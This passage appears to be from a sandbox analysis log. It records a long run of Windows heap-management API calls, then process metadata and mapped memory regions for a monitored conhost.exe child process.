[0191.816] GetProcessHeap () returned 0x4780000 [0191.816] GetProcessHeap () returned 0x4780000 [0191.816] HeapValidate (hHeap=0x4780000, dwFlags=0x0, lpMem=0x4789590) returned 1 [0191.816] GetProcessHeap () returned 0x4780000 [0191.816] RtlSizeHeap (HeapHandle=0x4780000, Flags=0x0, MemoryPointer=0x4789590) returned 0x14 [0191.816] RtlFreeHeap (HeapHandle=0x4780000, Flags=0x0, BaseAddress=0x4789590) returned 1 [0191.816] GetProcessHeap () returned 0x4780000 [0191.816] GetProcessHeap () returned 0x4780000 [0191.816] HeapValidate (hHeap=0x4780000, dwFlags=0x0, lpMem=0x4787470) returned 1 [0191.816] GetProcessHeap () returned 0x4780000 [0191.816] RtlSizeHeap (HeapHandle=0x4780000, Flags=0x0, MemoryPointer=0x4787470) returned 0x10 [0191.816] RtlFreeHeap (HeapHandle=0x4780000, Flags=0x0, BaseAddress=0x4787470) returned 1 [0191.816] GetProcessHeap () returned 0x4780000 [0191.816] GetProcessHeap () returned 0x4780000 [0191.816] HeapValidate (hHeap=0x4780000, dwFlags=0x0, lpMem=0x4782788) returned 1 [0191.816] GetProcessHeap () returned 0x4780000 [0191.816] RtlSizeHeap (HeapHandle=0x4780000, Flags=0x0, MemoryPointer=0x4782788) returned 0x14 [0191.816] RtlFreeHeap (HeapHandle=0x4780000, Flags=0x0, BaseAddress=0x4782788) returned 1 [0191.816] GetProcessHeap () returned 0x4780000 [0191.816] GetProcessHeap () returned 0x4780000 [0191.816] HeapValidate (hHeap=0x4780000, dwFlags=0x0, lpMem=0x4789470) returned 1 [0191.816] GetProcessHeap () returned 0x4780000 [0191.816] RtlSizeHeap (HeapHandle=0x4780000, Flags=0x0, MemoryPointer=0x4789470) returned 0x16 [0191.816] RtlFreeHeap (HeapHandle=0x4780000, Flags=0x0, BaseAddress=0x4789470) returned 1 [0191.816] GetProcessHeap () returned 0x4780000 [0191.816] GetProcessHeap () returned 0x4780000 [0191.816] HeapValidate (hHeap=0x4780000, dwFlags=0x0, lpMem=0x4787440) returned 1 [0191.816] GetProcessHeap () returned 0x4780000 [0191.816] RtlSizeHeap (HeapHandle=0x4780000, Flags=0x0, MemoryPointer=0x4787440) returned 0x10 [0191.817] RtlFreeHeap (HeapHandle=0x4780000, Flags=0x0, BaseAddress=0x4787440) returned 1 [0191.817] GetProcessHeap () returned 0x4780000 [0191.817] GetProcessHeap () returned 0x4780000 [0191.817] HeapValidate (hHeap=0x4780000, dwFlags=0x0, lpMem=0x4786620) returned 1 [0191.817] GetProcessHeap () returned 0x4780000 [0191.817] RtlSizeHeap (HeapHandle=0x4780000, Flags=0x0, MemoryPointer=0x4786620) returned 0x14 [0191.817] RtlFreeHeap (HeapHandle=0x4780000, Flags=0x0, BaseAddress=0x4786620) returned 1 [0191.817] GetProcessHeap () returned 0x4780000 [0191.817] GetProcessHeap () returned 0x4780000 [0191.817] HeapValidate (hHeap=0x4780000, dwFlags=0x0, lpMem=0x4780598) returned 1 [0191.817] GetProcessHeap () returned 0x4780000 [0191.817] RtlSizeHeap (HeapHandle=0x4780000, Flags=0x0, MemoryPointer=0x4780598) returned 0x2 [0191.817] RtlFreeHeap (HeapHandle=0x4780000, Flags=0x0, BaseAddress=0x4780598) returned 1 [0191.817] GetProcessHeap () returned 0x4780000 [0191.817] GetProcessHeap () returned 0x4780000 [0191.817] HeapValidate (hHeap=0x4780000, dwFlags=0x0, lpMem=0x4786e50) returned 1 [0191.817] GetProcessHeap () returned 0x4780000 [0191.817] RtlSizeHeap (HeapHandle=0x4780000, Flags=0x0, MemoryPointer=0x4786e50) returned 0x14 [0191.817] RtlFreeHeap (HeapHandle=0x4780000, Flags=0x0, BaseAddress=0x4786e50) returned 1 [0191.817] GetProcessHeap () returned 0x4780000 [0191.817] GetProcessHeap () returned 0x4780000 [0191.818] HeapValidate (hHeap=0x4780000, dwFlags=0x0, lpMem=0x4786c18) returned 1 [0191.818] GetProcessHeap () returned 0x4780000 [0191.818] RtlSizeHeap (HeapHandle=0x4780000, Flags=0x0, MemoryPointer=0x4786c18) returned 0x14 [0191.818] RtlFreeHeap (HeapHandle=0x4780000, Flags=0x0, BaseAddress=0x4786c18) returned 1 [0191.818] GetProcessHeap () returned 0x4780000 [0191.818] GetProcessHeap () returned 0x4780000 [0191.818] HeapValidate (hHeap=0x4780000, dwFlags=0x0, lpMem=0x4786c38) returned 1 [0191.818] GetProcessHeap () returned 0x4780000 [0191.818] RtlSizeHeap (HeapHandle=0x4780000, Flags=0x0, MemoryPointer=0x4786c38) returned 0x14 [0191.818] RtlFreeHeap (HeapHandle=0x4780000, Flags=0x0, BaseAddress=0x4786c38) returned 1 [0191.818] GetProcessHeap () returned 0x4780000 [0191.818] GetProcessHeap () returned 0x4780000 [0191.818] HeapValidate (hHeap=0x4780000, dwFlags=0x0, lpMem=0x4786c58) returned 1 [0191.818] GetProcessHeap () returned 0x4780000 [0191.818] RtlSizeHeap (HeapHandle=0x4780000, Flags=0x0, MemoryPointer=0x4786c58) returned 0x14 [0191.819] RtlFreeHeap (HeapHandle=0x4780000, Flags=0x0, BaseAddress=0x4786c58) returned 1 [0191.819] GetProcessHeap () returned 0x4780000 [0191.819] GetProcessHeap () returned 0x4780000 [0191.819] HeapValidate (hHeap=0x4780000, dwFlags=0x0, lpMem=0x4789450) returned 1 [0191.819] GetProcessHeap () returned 0x4780000 [0191.819] RtlSizeHeap (HeapHandle=0x4780000, Flags=0x0, MemoryPointer=0x4789450) returned 0x14 [0191.819] RtlFreeHeap (HeapHandle=0x4780000, Flags=0x0, BaseAddress=0x4789450) returned 1 [0191.819] GetProcessHeap () returned 0x4780000 [0191.819] GetProcessHeap () returned 0x4780000 [0191.819] HeapValidate (hHeap=0x4780000, dwFlags=0x0, lpMem=0x478abd0) returned 1 [0191.819] GetProcessHeap () returned 0x4780000 [0191.819] RtlSizeHeap (HeapHandle=0x4780000, Flags=0x0, MemoryPointer=0x478abd0) returned 0xc [0191.819] RtlFreeHeap (HeapHandle=0x4780000, Flags=0x0, BaseAddress=0x478abd0) returned 1 [0191.819] GetProcessHeap () returned 0x4780000 [0191.819] GetProcessHeap () returned 0x4780000 [0191.819] HeapValidate (hHeap=0x4780000, dwFlags=0x0, lpMem=0x4789530) returned 1 [0191.819] GetProcessHeap () returned 0x4780000 [0191.819] RtlSizeHeap (HeapHandle=0x4780000, Flags=0x0, MemoryPointer=0x4789530) returned 0x14 [0191.819] RtlFreeHeap (HeapHandle=0x4780000, Flags=0x0, BaseAddress=0x4789530) returned 1 [0191.819] GetProcessHeap () returned 0x4780000 [0191.819] GetProcessHeap () returned 0x4780000 [0191.819] HeapValidate (hHeap=0x4780000, dwFlags=0x0, lpMem=0x4786a90) returned 1 [0191.819] GetProcessHeap () returned 0x4780000 [0191.819] RtlSizeHeap (HeapHandle=0x4780000, Flags=0x0, MemoryPointer=0x4786a90) returned 0x30 [0191.819] RtlFreeHeap (HeapHandle=0x4780000, Flags=0x0, BaseAddress=0x4786a90) returned 1 [0191.819] GetProcessHeap () returned 0x4780000 [0191.819] GetProcessHeap () returned 0x4780000 [0191.819] HeapValidate (hHeap=0x4780000, dwFlags=0x0, lpMem=0x4789610) returned 1 [0191.819] GetProcessHeap () returned 0x4780000 [0191.819] RtlSizeHeap (HeapHandle=0x4780000, Flags=0x0, MemoryPointer=0x4789610) returned 0x14 [0191.820] RtlFreeHeap (HeapHandle=0x4780000, Flags=0x0, BaseAddress=0x4789610) returned 1 [0191.820] GetProcessHeap () returned 0x4780000 [0191.820] GetProcessHeap () returned 0x4780000 [0191.820] HeapValidate (hHeap=0x4780000, dwFlags=0x0, lpMem=0x47870d8) returned 1 [0191.820] GetProcessHeap () returned 0x4780000 [0191.820] RtlSizeHeap (HeapHandle=0x4780000, Flags=0x0, MemoryPointer=0x47870d8) returned 0x30 [0191.820] RtlFreeHeap (HeapHandle=0x4780000, Flags=0x0, BaseAddress=0x47870d8) returned 1 [0191.820] GetProcessHeap () returned 0x4780000 [0191.820] GetProcessHeap () returned 0x4780000 [0191.820] HeapValidate (hHeap=0x4780000, dwFlags=0x0, lpMem=0x4789690) returned 1 [0191.820] GetProcessHeap () returned 0x4780000 [0191.820] RtlSizeHeap (HeapHandle=0x4780000, Flags=0x0, MemoryPointer=0x4789690) returned 0x14 [0191.820] RtlFreeHeap (HeapHandle=0x4780000, Flags=0x0, BaseAddress=0x4789690) returned 1 [0191.820] GetProcessHeap () returned 0x4780000 [0191.820] GetProcessHeap () returned 0x4780000 [0191.820] HeapValidate (hHeap=0x4780000, dwFlags=0x0, lpMem=0x47895f0) returned 1 [0191.820] GetProcessHeap () returned 0x4780000 [0191.820] RtlSizeHeap (HeapHandle=0x4780000, Flags=0x0, MemoryPointer=0x47895f0) returned 0x16 [0191.820] RtlFreeHeap (HeapHandle=0x4780000, Flags=0x0, BaseAddress=0x47895f0) returned 1 [0191.820] GetProcessHeap () returned 0x4780000 [0191.820] GetProcessHeap () returned 0x4780000 [0191.820] HeapValidate (hHeap=0x4780000, dwFlags=0x0, lpMem=0x4789550) returned 1 [0191.820] GetProcessHeap () returned 0x4780000 [0191.820] RtlSizeHeap (HeapHandle=0x4780000, Flags=0x0, MemoryPointer=0x4789550) returned 0x14 [0191.820] RtlFreeHeap (HeapHandle=0x4780000, Flags=0x0, BaseAddress=0x4789550) returned 1 [0191.820] GetProcessHeap () returned 0x4780000 [0191.821] GetProcessHeap () returned 0x4780000 [0191.821] HeapValidate (hHeap=0x4780000, dwFlags=0x0, lpMem=0x47893f0) returned 1 [0191.821] GetProcessHeap () returned 0x4780000 [0191.821] RtlSizeHeap (HeapHandle=0x4780000, Flags=0x0, MemoryPointer=0x47893f0) returned 0x16 [0191.821] RtlFreeHeap (HeapHandle=0x4780000, Flags=0x0, BaseAddress=0x47893f0) returned 1 [0191.821] GetProcessHeap () returned 0x4780000 [0191.821] GetProcessHeap () returned 0x4780000 [0191.821] HeapValidate (hHeap=0x4780000, dwFlags=0x0, lpMem=0x4789570) returned 1 [0191.821] GetProcessHeap () returned 0x4780000 [0191.821] RtlSizeHeap (HeapHandle=0x4780000, Flags=0x0, MemoryPointer=0x4789570) returned 0x14 [0191.821] RtlFreeHeap (HeapHandle=0x4780000, Flags=0x0, BaseAddress=0x4789570) returned 1 [0191.821] GetProcessHeap () returned 0x4780000 [0191.821] GetProcessHeap () returned 0x4780000 [0191.821] HeapValidate (hHeap=0x4780000, dwFlags=0x0, lpMem=0x479a138) returned 1 [0191.821] GetProcessHeap () returned 0x4780000 [0191.821] RtlSizeHeap (HeapHandle=0x4780000, Flags=0x0, MemoryPointer=0x479a138) returned 0x82 [0191.821] RtlFreeHeap (HeapHandle=0x4780000, Flags=0x0, BaseAddress=0x479a138) returned 1 [0191.821] GetProcessHeap () returned 0x4780000 [0191.821] GetProcessHeap () returned 0x4780000 [0191.821] HeapValidate (hHeap=0x4780000, dwFlags=0x0, lpMem=0x47895b0) returned 1 [0191.821] GetProcessHeap () returned 0x4780000 [0191.821] RtlSizeHeap (HeapHandle=0x4780000, Flags=0x0, MemoryPointer=0x47895b0) returned 0x14 [0191.821] RtlFreeHeap (HeapHandle=0x4780000, Flags=0x0, BaseAddress=0x47895b0) returned 1 [0191.821] GetProcessHeap () returned 0x4780000 [0191.821] GetProcessHeap () returned 0x4780000 [0191.821] HeapValidate (hHeap=0x4780000, dwFlags=0x0, lpMem=0x478ab40) returned 1 [0191.821] GetProcessHeap () returned 0x4780000 [0191.821] RtlSizeHeap (HeapHandle=0x4780000, Flags=0x0, MemoryPointer=0x478ab40) returned 0xe [0191.821] RtlFreeHeap (HeapHandle=0x4780000, Flags=0x0, BaseAddress=0x478ab40) returned 1 [0191.821] GetProcessHeap () returned 0x4780000 [0191.822] GetProcessHeap () returned 0x4780000 [0191.822] HeapValidate (hHeap=0x4780000, dwFlags=0x0, lpMem=0x47893d0) returned 1 [0191.822] GetProcessHeap () returned 0x4780000 [0191.822] RtlSizeHeap (HeapHandle=0x4780000, Flags=0x0, MemoryPointer=0x47893d0) returned 0x14 [0191.822] RtlFreeHeap (HeapHandle=0x4780000, Flags=0x0, BaseAddress=0x47893d0) returned 1 [0191.822] GetProcessHeap () returned 0x4780000 [0191.822] GetProcessHeap () returned 0x4780000 [0191.822] HeapValidate (hHeap=0x4780000, dwFlags=0x0, lpMem=0x478aaf8) returned 1 [0191.822] GetProcessHeap () returned 0x4780000 [0191.822] RtlSizeHeap (HeapHandle=0x4780000, Flags=0x0, MemoryPointer=0x478aaf8) returned 0xc [0191.822] RtlFreeHeap (HeapHandle=0x4780000, Flags=0x0, BaseAddress=0x478aaf8) returned 1 [0191.822] GetProcessHeap () returned 0x4780000 [0191.822] GetProcessHeap () returned 0x4780000 [0191.822] HeapValidate (hHeap=0x4780000, dwFlags=0x0, lpMem=0x4789330) returned 1 [0191.822] GetProcessHeap () returned 0x4780000 [0191.822] RtlSizeHeap (HeapHandle=0x4780000, Flags=0x0, MemoryPointer=0x4789330) returned 0x14 [0191.822] RtlFreeHeap (HeapHandle=0x4780000, Flags=0x0, BaseAddress=0x4789330) returned 1 [0191.822] GetProcessHeap () returned 0x4780000 [0191.822] GetProcessHeap () returned 0x4780000 [0191.822] HeapValidate (hHeap=0x4780000, dwFlags=0x0, lpMem=0x478ac60) returned 1 [0191.822] GetProcessHeap () returned 0x4780000 [0191.822] RtlSizeHeap (HeapHandle=0x4780000, Flags=0x0, MemoryPointer=0x478ac60) returned 0xe [0191.822] RtlFreeHeap (HeapHandle=0x4780000, Flags=0x0, BaseAddress=0x478ac60) returned 1 [0191.822] GetProcessHeap () returned 0x4780000 [0191.822] GetProcessHeap () returned 0x4780000 [0191.822] HeapValidate (hHeap=0x4780000, dwFlags=0x0, lpMem=0x4789350) returned 1 [0191.822] GetProcessHeap () returned 0x4780000 [0191.822] RtlSizeHeap (HeapHandle=0x4780000, Flags=0x0, MemoryPointer=0x4789350) returned 0x14 [0191.822] RtlFreeHeap (HeapHandle=0x4780000, Flags=0x0, BaseAddress=0x4789350) returned 1 [0191.822] GetProcessHeap () returned 0x4780000 [0191.822] GetProcessHeap () returned 0x4780000 [0191.823] HeapValidate (hHeap=0x4780000, dwFlags=0x0, lpMem=0x478aa50) returned 1 [0191.823] GetProcessHeap () returned 0x4780000 [0191.823] RtlSizeHeap (HeapHandle=0x4780000, Flags=0x0, MemoryPointer=0x478aa50) returned 0x10 [0191.823] RtlFreeHeap (HeapHandle=0x4780000, Flags=0x0, BaseAddress=0x478aa50) returned 1 [0191.823] GetProcessHeap () returned 0x4780000 [0191.823] GetProcessHeap () returned 0x4780000 [0191.823] HeapValidate (hHeap=0x4780000, dwFlags=0x0, lpMem=0x47893b0) returned 1 [0191.823] GetProcessHeap () returned 0x4780000 [0191.823] RtlSizeHeap (HeapHandle=0x4780000, Flags=0x0, MemoryPointer=0x47893b0) returned 0x14 [0191.823] RtlFreeHeap (HeapHandle=0x4780000, Flags=0x0, BaseAddress=0x47893b0) returned 1 [0191.823] GetProcessHeap () returned 0x4780000 [0191.823] GetProcessHeap () returned 0x4780000 [0191.823] HeapValidate (hHeap=0x4780000, dwFlags=0x0, lpMem=0x47874e8) returned 1 [0191.823] GetProcessHeap () returned 0x4780000 [0191.823] RtlSizeHeap (HeapHandle=0x4780000, Flags=0x0, MemoryPointer=0x47874e8) returned 0x10 [0191.823] RtlFreeHeap (HeapHandle=0x4780000, Flags=0x0, BaseAddress=0x47874e8) returned 1 [0191.823] GetProcessHeap () returned 0x4780000 [0191.823] GetProcessHeap () returned 0x4780000 [0191.823] HeapValidate (hHeap=0x4780000, dwFlags=0x0, lpMem=0x4786848) returned 1 [0191.823] GetProcessHeap () returned 0x4780000 [0191.823] RtlSizeHeap (HeapHandle=0x4780000, Flags=0x0, MemoryPointer=0x4786848) returned 0x14 [0191.823] RtlFreeHeap (HeapHandle=0x4780000, Flags=0x0, BaseAddress=0x4786848) returned 1 [0191.823] GetProcessHeap () returned 0x4780000 [0191.823] GetProcessHeap () returned 0x4780000 [0191.824] HeapValidate (hHeap=0x4780000, dwFlags=0x0, lpMem=0x4786868) returned 1 [0191.824] GetProcessHeap () returned 0x4780000 [0191.824] RtlSizeHeap (HeapHandle=0x4780000, Flags=0x0, MemoryPointer=0x4786868) returned 0x14 [0191.824] RtlFreeHeap (HeapHandle=0x4780000, Flags=0x0, BaseAddress=0x4786868) returned 1 [0191.824] GetProcessHeap () returned 0x4780000 [0191.824] GetProcessHeap () returned 0x4780000 [0191.824] HeapValidate (hHeap=0x4780000, dwFlags=0x0, lpMem=0x4786888) returned 1 [0191.824] GetProcessHeap () returned 0x4780000 [0191.824] RtlSizeHeap (HeapHandle=0x4780000, Flags=0x0, MemoryPointer=0x4786888) returned 0x14 [0191.824] RtlFreeHeap (HeapHandle=0x4780000, Flags=0x0, BaseAddress=0x4786888) returned 1 [0191.824] GetProcessHeap () returned 0x4780000 [0191.824] GetProcessHeap () returned 0x4780000 [0191.824] HeapValidate (hHeap=0x4780000, dwFlags=0x0, lpMem=0x47865e0) returned 1 [0191.824] GetProcessHeap () returned 0x4780000 [0191.824] RtlSizeHeap (HeapHandle=0x4780000, Flags=0x0, MemoryPointer=0x47865e0) returned 0x14 [0191.824] RtlFreeHeap (HeapHandle=0x4780000, Flags=0x0, BaseAddress=0x47865e0) returned 1 [0191.824] GetProcessHeap () returned 0x4780000 [0191.824] GetProcessHeap () returned 0x4780000 [0191.824] HeapValidate (hHeap=0x4780000, dwFlags=0x0, lpMem=0x47873c8) returned 1 [0191.824] GetProcessHeap () returned 0x4780000 [0191.824] RtlSizeHeap (HeapHandle=0x4780000, Flags=0x0, MemoryPointer=0x47873c8) returned 0x10 [0191.824] RtlFreeHeap (HeapHandle=0x4780000, Flags=0x0, BaseAddress=0x47873c8) returned 1 [0191.824] GetProcessHeap () returned 0x4780000 [0191.824] GetProcessHeap () returned 0x4780000 [0191.824] HeapValidate (hHeap=0x4780000, dwFlags=0x0, lpMem=0x4786600) returned 1 [0191.824] GetProcessHeap () returned 0x4780000 [0191.824] RtlSizeHeap (HeapHandle=0x4780000, Flags=0x0, MemoryPointer=0x4786600) returned 0x14 [0191.825] RtlFreeHeap (HeapHandle=0x4780000, Flags=0x0, BaseAddress=0x4786600) returned 1 [0191.825] GetProcessHeap () returned 0x4780000 [0191.825] GetProcessHeap () returned 0x4780000 [0191.825] HeapValidate (hHeap=0x4780000, dwFlags=0x0, lpMem=0x47827a8) returned 1 [0191.825] GetProcessHeap () returned 0x4780000 [0191.825] RtlSizeHeap (HeapHandle=0x4780000, Flags=0x0, MemoryPointer=0x47827a8) returned 0x14 [0191.825] RtlFreeHeap (HeapHandle=0x4780000, Flags=0x0, BaseAddress=0x47827a8) returned 1 [0191.825] GetProcessHeap () returned 0x4780000 [0191.825] GetProcessHeap () returned 0x4780000 [0191.825] HeapValidate (hHeap=0x4780000, dwFlags=0x0, lpMem=0x47896f0) returned 1 [0191.825] GetProcessHeap () returned 0x4780000 [0191.825] RtlSizeHeap (HeapHandle=0x4780000, Flags=0x0, MemoryPointer=0x47896f0) returned 0x14 [0191.825] RtlFreeHeap (HeapHandle=0x4780000, Flags=0x0, BaseAddress=0x47896f0) returned 1 [0191.825] GetProcessHeap () returned 0x4780000 [0191.825] GetProcessHeap () returned 0x4780000 [0191.825] HeapValidate (hHeap=0x4780000, dwFlags=0x0, lpMem=0x47896d0) returned 1 [0191.825] GetProcessHeap () returned 0x4780000 [0191.825] RtlSizeHeap (HeapHandle=0x4780000, Flags=0x0, MemoryPointer=0x47896d0) returned 0x14 [0191.825] RtlFreeHeap (HeapHandle=0x4780000, Flags=0x0, BaseAddress=0x47896d0) returned 1 [0191.825] GetProcessHeap () returned 0x4780000 [0191.825] GetProcessHeap () returned 0x4780000 [0191.825] HeapValidate (hHeap=0x4780000, dwFlags=0x0, lpMem=0x4789510) returned 1 [0191.825] GetProcessHeap () returned 0x4780000 [0191.825] RtlSizeHeap (HeapHandle=0x4780000, Flags=0x0, MemoryPointer=0x4789510) returned 0x14 [0191.825] RtlFreeHeap (HeapHandle=0x4780000, Flags=0x0, BaseAddress=0x4789510) returned 1 [0191.826] GetProcessHeap () returned 0x4780000 [0191.826] GetProcessHeap () returned 0x4780000 [0191.826] HeapValidate (hHeap=0x4780000, dwFlags=0x0, lpMem=0x4787428) returned 1 [0191.826] GetProcessHeap () returned 0x4780000 [0191.826] RtlSizeHeap (HeapHandle=0x4780000, Flags=0x0, MemoryPointer=0x4787428) returned 0x10 [0191.826] RtlFreeHeap (HeapHandle=0x4780000, Flags=0x0, BaseAddress=0x4787428) returned 1 [0191.826] GetProcessHeap () returned 0x4780000 [0191.826] GetProcessHeap () returned 0x4780000 [0191.826] HeapValidate (hHeap=0x4780000, dwFlags=0x0, lpMem=0x47827c8) returned 1 [0191.826] GetProcessHeap () returned 0x4780000 [0191.826] RtlSizeHeap (HeapHandle=0x4780000, Flags=0x0, MemoryPointer=0x47827c8) returned 0x14 [0191.826] RtlFreeHeap (HeapHandle=0x4780000, Flags=0x0, BaseAddress=0x47827c8) returned 1 [0191.826] GetProcessHeap () returned 0x4780000 [0191.826] GetProcessHeap () returned 0x4780000 [0191.826] HeapValidate (hHeap=0x4780000, dwFlags=0x0, lpMem=0x4787410) returned 1 [0191.826] GetProcessHeap () returned 0x4780000 [0191.826] RtlSizeHeap (HeapHandle=0x4780000, Flags=0x0, MemoryPointer=0x4787410) returned 0x10 [0191.826] RtlFreeHeap (HeapHandle=0x4780000, Flags=0x0, BaseAddress=0x4787410) returned 1 [0191.826] exit (_Code=0) Thread: id = 149 os_tid = 0x1298 Process: id = "13" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x35a92000" os_pid = "0x1268" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "12" os_parent_pid = "0x1258" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\Windows" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f142" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1811 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1812 start_va = 0x30000 end_va = 0x44fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 1813 start_va = 0x50000 end_va = 0x8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 1814 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 1815 start_va = 0x400000 end_va = 0x5fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 1816 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1817 start_va = 0x7df5fffc0000 end_va = 0x7df5fffe2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5fffc0000" filename = "" Region: id = 1818 start_va = 0x7df5ffff0000 end_va = 0x7ff5fffeffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffff0000" filename = "" Region: id = 1819 start_va = 0x7ff7a29a0000 end_va = 0x7ff7a29b0fff monitored = 0 entry_point = 0x7ff7a29a16b0 region_type = mapped_file name = "conhost.exe" filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe") Region: id = 1820 start_va = 0x7ffb28b00000 end_va = 0x7ffb28cc0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1821 start_va = 0x700000 end_va = 0x7fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000700000" filename = "" Region: id = 1822 start_va = 0x7ffb251b0000 end_va = 0x7ffb25397fff monitored = 0 entry_point = 0x7ffb251dba70 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1823 start_va = 0x7ffb26230000 end_va = 0x7ffb262dcfff monitored = 0 entry_point = 0x7ffb262481a0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1824 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1825 start_va = 0x7df5ffec0000 end_va = 0x7df5fffbffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffec0000" filename = "" Region: id = 1826 start_va = 0x90000 end_va = 0x14dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1827 start_va = 0x7ffb264f0000 end_va = 0x7ffb2658cfff monitored = 0 entry_point = 0x7ffb264f78a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1828 start_va = 0x150000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 1829 start_va = 0x600000 end_va = 0x6cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000600000" filename = "" Region: id = 1830 start_va = 0x20000 end_va = 0x26fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1831 start_va = 0x7ffb1cba0000 end_va = 0x7ffb1cbf8fff monitored = 0 entry_point = 0x7ffb1cbafbf0 region_type = mapped_file name = "conhostv2.dll" filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll") Region: id = 1832 start_va = 0x190000 end_va = 0x190fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 1833 start_va = 0x7ffb27e00000 end_va = 0x7ffb2807cfff monitored = 0 entry_point = 0x7ffb27ed4970 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 1834 start_va = 0x7ffb26590000 end_va = 0x7ffb266abfff monitored = 0 entry_point = 0x7ffb265d02b0 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 1835 start_va = 0x7ffb25640000 end_va = 0x7ffb256a9fff monitored = 0 entry_point = 0x7ffb25676d50 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 1836 start_va = 0x7ffb26090000 end_va = 0x7ffb261e5fff monitored = 0 entry_point = 0x7ffb2609a8d0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1837 start_va = 0x7ffb25f00000 end_va = 0x7ffb26085fff monitored = 0 entry_point = 0x7ffb25f4ffc0 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 1838 start_va = 0x1a0000 end_va = 0x1a6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 1839 start_va = 0x7ffb281e0000 end_va = 0x7ffb28322fff monitored = 0 entry_point = 0x7ffb28208210 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 1840 start_va = 0x7ffb27d40000 end_va = 0x7ffb27d9afff monitored = 0 entry_point = 0x7ffb27d538b0 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 1841 start_va = 0x7ffb261f0000 end_va = 0x7ffb2622afff monitored = 0 entry_point = 0x7ffb261f12f0 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 1842 start_va = 0x7ffb288f0000 end_va = 0x7ffb289b0fff monitored = 0 entry_point = 0x7ffb28910da0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 1843 start_va = 0x7ffb23670000 end_va = 0x7ffb237f5fff monitored = 0 entry_point = 0x7ffb236bd700 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 1844 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 